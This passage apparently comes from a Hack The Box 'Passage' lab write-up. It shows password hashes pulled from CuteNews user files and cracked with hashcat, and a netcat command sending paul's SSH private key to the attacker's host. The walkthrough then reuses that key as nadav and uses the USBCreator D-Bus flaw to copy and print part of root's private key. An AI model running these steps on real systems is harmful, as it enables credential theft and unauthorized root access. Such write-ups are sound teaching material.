a:1:<span class="o">{</span>s:4:<span class="s2">"name"</span><span class="p">;</span>a:1:<span class="o">{</span>s:10:<span class="s2">"paul-coles"</span><span class="p">;</span>a:9:<span class="o">{</span>s:2:<span class="s2">"id"</span><span class="p">;</span>s:10:<span class="s2">"1592483236"</span><span class="p">;</span>s:4:<span class="s2">"name"</span><span class="p">;</span>s:10:<span class="s2">"paul-coles"</span><span class="p">;</span>s:3:<span class="s2">"acl"</span><span class="p">;</span>s:1:<span class="s2">"2"</span><span class="p">;</span>s:5:<span class="s2">"email"</span><span class="p">;</span>s:16:<span class="s2">"paul@passage.htb"</span><span class="p">;</span>s:4:<span class="s2">"nick"</span><span class="p">;</span>s:10:<span class="s2">"Paul Coles"</span><span class="p">;</span>s:4:<span class="s2">"pass"</span><span class="p">;</span>s:64:<span class="s2">"e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd"</span><span class="p">;</span>s:3:<span class="s2">"lts"</span><span class="p">;</span>s:10:<span class="s2">"1592485556"</span><span class="p">;</span>s:3:<span class="s2">"ban"</span><span class="p">;</span>s:1:<span class="s2">"0"</span><span class="p">;</span>s:3:<span class="s2">"cnt"</span><span class="p">;</span>s:1:<span class="s2">"2"</span><span class="p">;</span><span class="o">}}}</span>
a:1:<span class="o">{</span>s:4:<span class="s2">"name"</span><span class="p">;</span>a:1:<span class="o">{</span>s:9:<span class="s2">"kim-swift"</span><span class="p">;</span>a:9:<span class="o">{</span>s:2:<span class="s2">"id"</span><span class="p">;</span>s:10:<span class="s2">"1592483309"</span><span class="p">;</span>s:4:<span class="s2">"name"</span><span class="p">;</span>s:9:<span class="s2">"kim-swift"</span><span class="p">;</span>s:3:<span class="s2">"acl"</span><span class="p">;</span>s:1:<span class="s2">"3"</span><span class="p">;</span>s:5:<span class="s2">"email"</span><span class="p">;</span>s:15:<span class="s2">"kim@example.com"</span><span class="p">;</span>s:4:<span class="s2">"nick"</span><span class="p">;</span>s:9:<span class="s2">"Kim Swift"</span><span class="p">;</span>s:4:<span class="s2">"pass"</span><span class="p">;</span>s:64:<span class="s2">"f669a6f691f98ab0562356c0cd5d5e7dcdc20a07941c86adcfce9af3085fbeca"</span><span class="p">;</span>s:3:<span class="s2">"lts"</span><span class="p">;</span>s:10:<span class="s2">"1592487096"</span><span class="p">;</span>s:3:<span class="s2">"ban"</span><span class="p">;</span>s:1:<span class="s2">"0"</span><span class="p">;</span>s:3:<span class="s2">"cnt"</span><span class="p">;</span>s:1:<span class="s2">"3"</span><span class="p">;</span><span class="o">}}}</span>
a:1:<span class="o">{</span>s:4:<span class="s2">"name"</span><span class="p">;</span>a:1:<span class="o">{</span>s:6:<span class="s2">"egre55"</span><span class="p">;</span>a:11:<span class="o">{</span>s:2:<span class="s2">"id"</span><span class="p">;</span>s:10:<span class="s2">"1598829833"</span><span class="p">;</span>s:4:<span class="s2">"name"</span><span class="p">;</span>s:6:<span class="s2">"egre55"</span><span class="p">;</span>s:3:<span class="s2">"acl"</span><span class="p">;</span>s:1:<span class="s2">"4"</span><span class="p">;</span>s:5:<span class="s2">"email"</span><span class="p">;</span>s:15:<span class="s2">"egre55@test.com"</span><span class="p">;</span>s:4:<span class="s2">"nick"</span><span class="p">;</span>s:6:<span class="s2">"egre55"</span><span class="p">;</span>s:4:<span class="s2">"pass"</span><span class="p">;</span>s:64:<span class="s2">"4db1f0bfd63be058d4ab04f18f65331ac11bb494b5792c480faf7fb0c40fa9cc"</span><span class="p">;</span>s:4:<span class="s2">"more"</span><span class="p">;</span>s:60:<span class="s2">"YToyOntzOjQ6InNpdGUiO3M6MDoiIjtzOjU6ImFib3V0IjtzOjA6IiI7fQ=="</span><span class="p">;</span>s:3:<span class="s2">"lts"</span><span class="p">;</span>s:10:<span class="s2">"1598834079"</span><span class="p">;</span>s:3:<span class="s2">"ban"</span><span class="p">;</span>s:1:<span class="s2">"0"</span><span class="p">;</span>s:6:<span class="s2">"avatar"</span><span class="p">;</span>s:26:<span class="s2">"avatar_egre55_spwvgujw.php"</span><span class="p">;</span>s:6:<span class="s2">"e-hide"</span><span class="p">;</span>s:0:<span class="s2">""</span><span class="p">;</span><span class="o">}}}</span>
a:1:<span class="o">{</span>s:2:<span class="s2">"id"</span><span class="p">;</span>a:1:<span class="o">{</span>i:1592483309<span class="p">;</span>s:9:<span class="s2">"kim-swift"</span><span class="p">;</span><span class="o">}}</span>
</pre></td></tr></tbody></table></code></pre></div></div>

<p>Appears to be PHP serialized data, Interestingly it does have the <code class="language-plaintext highlighter-rouge">pass</code> parameter containing password hash.</p>

<p>Looking at a sample hash, it‚Äôs containing 64 characters, so let‚Äôs again make use of grep and fetch the hashes containing 64 characters.</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre></td> --><td class="rouge-code"><pre>www-data@passage:/var/www/html/CuteNews/cdata/users<span class="nv">$ </span><span class="nb">cat</span> <span class="k">*</span> | <span class="nb">grep</span> <span class="nt">-v</span> <span class="s1">'php die'</span> | <span class="k">while </span><span class="nb">read </span>line<span class="p">;</span> <span class="k">do </span><span class="nb">echo</span> <span class="nv">$line</span> | <span class="nb">base64</span> <span class="nt">-d</span><span class="p">;</span> <span class="nb">echo</span><span class="p">;</span> <span class="k">done</span> | <span class="nb">grep</span> <span class="nt">-oP</span> <span class="o">[</span>a-z0-9]<span class="o">{</span>64<span class="o">}</span>
7144a8b531c27a60b51d81ae16be3a81cef722e11b43a26fde0ca97f9e1485e1
4bdd0a0bb47fc9f66cbf1a8982fd2d344d2aec283d1afaebb4653ec3954dff88
e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd
f669a6f691f98ab0562356c0cd5d5e7dcdc20a07941c86adcfce9af3085fbeca
4db1f0bfd63be058d4ab04f18f65331ac11bb494b5792c480faf7fb0c40fa9cc
</pre></td></tr></tbody></table></code></pre></div></div>

<h3 id="cracking-hashes">Cracking hashes</h3>

<p>Let‚Äôs map usernames against these hashes referring <code class="language-plaintext highlighter-rouge">nick</code> &amp; <code class="language-plaintext highlighter-rouge">email</code> parameter of serialized data and store these hashes in a file:</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre></td> --><td class="rouge-code"><pre>cfx:  ~/Documents/htb/passage
‚Üí <span class="nb">cat </span>hashes
nadav:7144a8b531c27a60b51d81ae16be3a81cef722e11b43a26fde0ca97f9e1485e1
sid:4bdd0a0bb47fc9f66cbf1a8982fd2d344d2aec283d1afaebb4653ec3954dff88
paul:e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd
kim:f669a6f691f98ab0562356c0cd5d5e7dcdc20a07941c86adcfce9af3085fbeca
egre55:4db1f0bfd63be058d4ab04f18f65331ac11bb494b5792c480faf7fb0c40fa9cc
</pre></td></tr></tbody></table></code></pre></div></div>

<p>Identifying the hashcat mode:</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
</pre></td> --><td class="rouge-code"><pre>cfx:  ~/Documents/htb/passage
‚Üí hashid <span class="nt">-m</span> <span class="s1">'7144a8b531c27a60b51d81ae16be3a81cef722e11b43a26fde0ca97f9e1485e1'</span>
Analyzing <span class="s1">'7144a8b531c27a60b51d81ae16be3a81cef722e11b43a26fde0ca97f9e1485e1'</span>
<span class="o">[</span>+] Snefru-256
<span class="o">[</span>+] SHA-256 <span class="o">[</span>Hashcat Mode: 1400]
<span class="o">[</span>+] RIPEMD-256
<span class="o">[</span>+] Haval-256
<span class="o">[</span>+] GOST R 34.11-94 <span class="o">[</span>Hashcat Mode: 6900]
<span class="o">[</span>+] GOST CryptoPro S-Box
<span class="o">[</span>+] SHA3-256 <span class="o">[</span>Hashcat Mode: 5000]
<span class="o">[</span>+] Skein-256
<span class="o">[</span>+] Skein-512<span class="o">(</span>256<span class="o">)</span>
</pre></td></tr></tbody></table></code></pre></div></div>

<p>Possibly the hash type is SHA-256 which is 1400 hashcat mode</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td> --><td class="rouge-code"><pre>cfx:  ~/Documents/htb/passage
‚Üí hashcat <span class="nt">-m</span> 1400 hashes /usr/share/wordlists/rockyou.txt <span class="nt">--username</span> <span class="nt">--show</span>
paul:e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd:atlanta1
</pre></td></tr></tbody></table></code></pre></div></div>

<p>We got the password for paul as <code class="language-plaintext highlighter-rouge">atlanta1</code></p>

<h3 id="su---paul">su - paul</h3>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre></td> --><td class="rouge-code"><pre>www-data@passage:/var/www<span class="nv">$ </span>su paul -
Password:
paul@passage:/var/www<span class="nv">$ </span><span class="nb">cd</span> ~
paul@passage:~<span class="nv">$ </span><span class="nb">ls
</span>Desktop  Documents  Downloads  examples.desktop  Music  Pictures  Public  Templates  user.txt  Videos
</pre></td></tr></tbody></table></code></pre></div></div>

<p>Grabbing <code class="language-plaintext highlighter-rouge">user.txt</code>:</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td> --><td class="rouge-code"><pre>paul@passage:~<span class="nv">$ </span><span class="nb">cat </span>user.txt
a456f9e6439dffd<span class="k">*****************</span>
</pre></td></tr></tbody></table></code></pre></div></div>

<h2 id="elevating-priv-paul---nadav">Elevating Priv: paul -&gt; nadav</h2>

<h3 id="ssh-access">SSH access</h3>

<p>We are unable to SSH as paul as it requires auth key.</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td> --><td class="rouge-code"><pre>cfx:  ~/Documents/htb/passage
‚Üí ssh paul@10.10.10.206
paul@10.10.10.206: Permission denied <span class="o">(</span>publickey<span class="o">)</span><span class="nb">.</span>
</pre></td></tr></tbody></table></code></pre></div></div>

<p>Grabbing Paul‚Äôs SSH key:</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre></td> --><td class="rouge-code"><pre>paul@passage:~/.ssh<span class="nv">$ </span><span class="nb">base64 </span>id_rsa | nc <span class="nt">-w</span> 5 10.10.14.11 8050

cfx:  ~/Documents/htb/passage
‚Üí nc <span class="nt">-lvnp</span> 8050 | <span class="nb">base64</span> <span class="nt">-d</span> <span class="o">&gt;</span> id_rsa
Ncat: Version 7.91 <span class="o">(</span> https://nmap.org/ncat <span class="o">)</span>
Ncat: Listening on :::8050
Ncat: Listening on 0.0.0.0:8050
Ncat: Connection from 10.10.10.206.
Ncat: Connection from 10.10.10.206:33184.
</pre></td></tr></tbody></table></code></pre></div></div>

<p>Now we can SSH as paul using the private key</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre></td> --><td class="rouge-code"><pre>cfx:  ~/Documents/htb/passage
‚Üí <span class="nb">chmod </span>600 id_rsa

cfx:  ~/Documents/htb/passage
‚Üí ssh <span class="nt">-i</span> id_rsa paul@10.10.10.206
paul@passage:~<span class="nv">$ </span><span class="nb">id
</span><span class="nv">uid</span><span class="o">=</span>1001<span class="o">(</span>paul<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>1001<span class="o">(</span>paul<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>1001<span class="o">(</span>paul<span class="o">)</span>
</pre></td></tr></tbody></table></code></pre></div></div>

<h3 id="enumeration-1">Enumeration</h3>

<p>Going around the ssh directory we find something weirdly interesting:</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre></td> --><td class="rouge-code"><pre>paul@passage:~/.ssh<span class="nv">$ </span><span class="nb">ls
</span>authorized_keys  id_rsa  id_rsa.pub  known_hosts
paul@passage:~/.ssh<span class="nv">$ </span><span class="nb">cat </span>authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzXiscFGV3l9T2gvXOkh9w+BpPnhFv5AOPagArgzWDk9uUq7/4v4kuzso/lAvQIg2gYaEHlDdpqd9gCYA7tg76N5RLbroGqA6Po91Q69PQadLsziJnYumbhClgPLGuBj06YKDktI3bo/H3jxYTXY3kfIUKo3WFnoVZiTmvKLDkAlO/+S2tYQa7wMleSR01pP4VExxPW4xDfbLnnp9zOUVBpdCMHl8lRdgogOQuEadRNRwCdIkmMEY5efV3YsYcwBwc6h/ZB4u8xPyH3yFlBNR7JADkn7ZFnrdvTh3OY+kLEr6FuiSyOEWhcPybkM5hxdL9ge9bWreSfNC1122qq49d nadav@passage

</pre></td></tr></tbody></table></code></pre></div></div>

<p>The entry at the end say <code class="language-plaintext highlighter-rouge">nadav@passage</code> which makes us wonder whether it‚Äôs a shared key concept.</p>

<h3 id="ssh---nadav">SSH - nadav</h3>

<p>Using the same key to SSH as nadav:</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td> --><td class="rouge-code"><pre>cfx:  ~/Documents/htb/passage
‚Üí ssh <span class="nt">-i</span> id_rsa nadav@10.10.10.206
Last login: Mon Aug 31 15:07:54 2020 from 127.0.0.1
nadav@passage:~<span class="err">$</span>
</pre></td></tr></tbody></table></code></pre></div></div>

<h2 id="elevating-priv-nadav---root">Elevating Priv: nadav -&gt; root</h2>

<p>User nadav is member of quite some groups including <code class="language-plaintext highlighter-rouge">sudo</code>:</p>

<p>Unfortunately we can‚Äôt sudo as it requires password.</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre></td> --><td class="rouge-code"><pre>nadav@passage:~<span class="nv">$ </span><span class="nb">id
</span><span class="nv">uid</span><span class="o">=</span>1000<span class="o">(</span>nadav<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>1000<span class="o">(</span>nadav<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>1000<span class="o">(</span>nadav<span class="o">)</span>,4<span class="o">(</span>adm<span class="o">)</span>,24<span class="o">(</span>cdrom<span class="o">)</span>,27<span class="o">(</span><span class="nb">sudo</span><span class="o">)</span>,30<span class="o">(</span>dip<span class="o">)</span>,46<span class="o">(</span>plugdev<span class="o">)</span>,113<span class="o">(</span>lpadmin<span class="o">)</span>,128<span class="o">(</span>sambashare<span class="o">)</span>

nadav@passage:~<span class="nv">$ </span><span class="nb">sudo</span> <span class="nt">-l</span>
<span class="o">[</span><span class="nb">sudo</span><span class="o">]</span> password <span class="k">for </span>nadav:
Sorry, try again.
<span class="o">[</span><span class="nb">sudo</span><span class="o">]</span> password <span class="k">for </span>nadav:

</pre></td></tr></tbody></table></code></pre></div></div>

<h3 id="enumeration-2">Enumeration</h3>

<p>Inside nadav‚Äôs home directory we discover <code class="language-plaintext highlighter-rouge">.viminfo</code> which is typically vim‚Äôs cache kind of file:</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
</pre></td> --><td class="rouge-code"><pre>nadav@passage:~<span class="nv">$ </span><span class="nb">cat</span> .viminfo
<span class="c"># This viminfo file was generated by Vim 7.4.</span>
<span class="c"># You may edit it if you're careful!</span>

<span class="c"># Value of 'encoding' when this file was written</span>
<span class="k">*</span><span class="nv">encoding</span><span class="o">=</span>utf-8


<span class="c"># hlsearch on (H) or off (h):</span>
~h
<span class="c"># Last Substitute Search Pattern:</span>
~MSle0~&amp;AdminIdentities<span class="o">=</span>unix-group:root

<span class="c"># Last Substitute String:</span>
<span class="nv">$AdminIdentities</span><span class="o">=</span>unix-group:sudo

<span class="c"># Command Line History (newest to oldest):</span>
:wq
:%s/AdminIdentities<span class="o">=</span>unix-group:root/AdminIdentities<span class="o">=</span>unix-group:sudo/g

<span class="c"># Search String History (newest to oldest):</span>
? <span class="nv">AdminIdentities</span><span class="o">=</span>unix-group:root

<span class="c"># Expression History (newest to oldest):</span>

<span class="c"># Input Line History (newest to oldest):</span>

<span class="c"># Input Line History (newest to oldest):</span>

<span class="c"># Registers:</span>

<span class="c"># File marks:</span>
<span class="s1">'0  12  7  /etc/dbus-1/system.d/com.ubuntu.USBCreator.conf
'</span>1  2  0  /etc/polkit-1/localauthority.conf.d/51-ubuntu-admin.conf

<span class="c"># Jumplist (newest first):</span>
-<span class="s1">'  12  7  /etc/dbus-1/system.d/com.ubuntu.USBCreator.conf
-'</span>  1  0  /etc/dbus-1/system.d/com.ubuntu.USBCreator.conf
-<span class="s1">'  2  0  /etc/polkit-1/localauthority.conf.d/51-ubuntu-admin.conf
-'</span>  1  0  /etc/polkit-1/localauthority.conf.d/51-ubuntu-admin.conf
-<span class="s1">'  2  0  /etc/polkit-1/localauthority.conf.d/51-ubuntu-admin.conf
-'</span>  1  0  /etc/polkit-1/localauthority.conf.d/51-ubuntu-admin.conf

<span class="c"># History of marks within files (newest to oldest):</span>

<span class="o">&gt;</span> /etc/dbus-1/system.d/com.ubuntu.USBCreator.conf
        <span class="s2">"       12      7

&gt; /etc/polkit-1/localauthority.conf.d/51-ubuntu-admin.conf
        "</span>       2       0
        <span class="nb">.</span>       2       0
        +       2       0
</pre></td></tr></tbody></table></code></pre></div></div>

<p>Looking at the viminfo we see the user interacted with two file and both of them are owned by root:</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td> --><td class="rouge-code"><pre>nadav@passage:~<span class="nv">$ </span><span class="nb">ls</span> <span class="nt">-la</span> /etc/polkit-1/localauthority.conf.d/51-ubuntu-admin.conf /etc/dbus-1/system.d/com.ubuntu.USBCreator.conf
<span class="nt">-rw-r--r--</span> 1 root root 766 Apr 29  2015 /etc/dbus-1/system.d/com.ubuntu.USBCreator.conf
<span class="nt">-rw-r--r--</span> 1 root root  65 Jan 15  2019 /etc/polkit-1/localauthority.conf.d/51-ubuntu-admin.conf
</pre></td></tr></tbody></table></code></pre></div></div>

<p>A quick google on <code class="language-plaintext highlighter-rouge">ubuntu usb creater exploit</code> brings us to this <a href="https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/"><strong>article</strong></a> from Palo Alto</p>

<p>As per the article:</p>

<blockquote>
  <p>Vulnerability in the USBCreator D-Bus interface allows an attacker with access to a user in the sudoer group to bypass the password security policy imposed by the sudo program. The vulnerability allows an attacker to overwrite arbitrary files with arbitrary content, as root ‚Äì without supplying a password. This trivially leads to elevated privileges, for instance, by overwriting the shadow file and setting a password for root.</p>
</blockquote>

<p>Apparently to exploit this bug we just need to be in sudo group, which we are already.</p>

<p>Referring the article we‚Äôll use the command used at the end of the article to copy root‚Äôs SSH key data to another file.</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td> --><td class="rouge-code"><pre>nadav@passage:~<span class="nv">$ </span>gdbus call <span class="nt">--system</span> <span class="nt">--dest</span> com.ubuntu.USBCreator <span class="nt">--object-path</span> /com/ubuntu/USBCreator <span class="nt">--method</span> com.ubuntu.USBCreator.Image /root/.ssh/id_rsa /tmp/coldfx <span class="nb">true</span>
<span class="o">()</span>
</pre></td></tr></tbody></table></code></pre></div></div>

<p>Checking if the file is created:</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
</pre></td> --><td class="rouge-code"><pre>nadav@passage:~<span class="nv">$ </span><span class="nb">cd</span> /tmp/
nadav@passage:/tmp<span class="nv">$ </span><span class="nb">ls</span> <span class="nt">-la</span> coldfx
<span class="nt">-rw-r--r--</span> 1 root root 1675 Mar  9 11:22 coldfx
nadav@passage:/tmp<span class="nv">$ </span><span class="nb">cat </span>coldfx
<span class="nt">-----BEGIN</span> RSA PRIVATE KEY-----
MIIEogIBAAKCAQEAth1mFSVw6Erdhv7qc+Z5KWQMPtwTsT9630uzpq5fBx/KKzqZ
B7G3ej77MN35+ULlwMcpoumayWK4yZ/AiJBm6FEVBGSwjSMpOGcNXTL1TClGWbdE
+WNBT+30n0XJzi/JPhpoWhXM4OqYLCysX+/b0psF0jYLWy0MjqCjCl/muQtD6f2e
jc2JY1KMMIppoq5DwB/jJxq1+eooLMWVAo9MDNDmxDiw+uWRUe8nj9qFK2LRKfG6
U6wnyQ10ANXIdRIY0bzzhQYTMyH7o5/sjddrRGMDZFmOq6wHYN5sUU+sZDYD18Yg
ezdTw/BBiDMEPzZuCUlW57U+eX3uY+/Iffl+AwIDAQABAoIBACFJkF4vIMsk3AcP
0zTqHJ1nLyHSQjs0ujXUdXrzBmWb9u0d4djZMAtFNc7B1C4ufyZUgRTJFETZKaOY
8q1Dj7vJDklmSisSETfBBl1RsiqApN5DNHVNIiQE/6CZNgDdFTCnzQkiUPePic8R
P1St2AVP1qmMvVimDFSJoiOEUfzidepXEEUQrByNmOJDtewMSm4aGz60ced2XCBr
<span class="o">[</span>..SNIP..]
</pre></td></tr></tbody></table></code></pre></div></div>
<p>It worked !! A file is created with root‚Äôs id_rsa owned by root but readable by us as well.</p>

<p>Transferring the key to our machine to SSH as root.</p>

<h3 id="ssh---root">SSH - root</h3>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
</pre></td> --><td class="rouge-code"><pre>cfx:  ~/Documents/htb/passage
‚Üí <span class="nb">chmod </span>600 root-id_rsa

cfx:  ~/Documents/htb/passage
‚Üí ssh <span class="nt">-i</span> root-id_rsa root@10.10.10.206
Last login: Mon Aug 31 15:14:22 2020 from 127.0.0.1
root@passage:~# <span class="nb">id
</span><span class="nv">uid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span>
root@passage:~# <span class="nb">whoami</span><span class="p">;</span> <span class="nb">date
</span>root
Tue Nov 17 02:07:40 PST 2020
</pre></td></tr></tbody></table></code></pre></div></div>

<p>Grabbing <code class="language-plaintext highlighter-rouge">root.txt</code>:</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td> --><td class="rouge-code"><pre>root@passage:~# <span class="nb">cat </span>root.txt
0811a74c5b64843<span class="k">*****************</span>
</pre></td></tr></tbody></table></code></pre></div></div>

<p>And we pwned the Box !</p>

<p>Thanks for reading, Suggestions &amp; Feedback are appreciated !</p>
:ET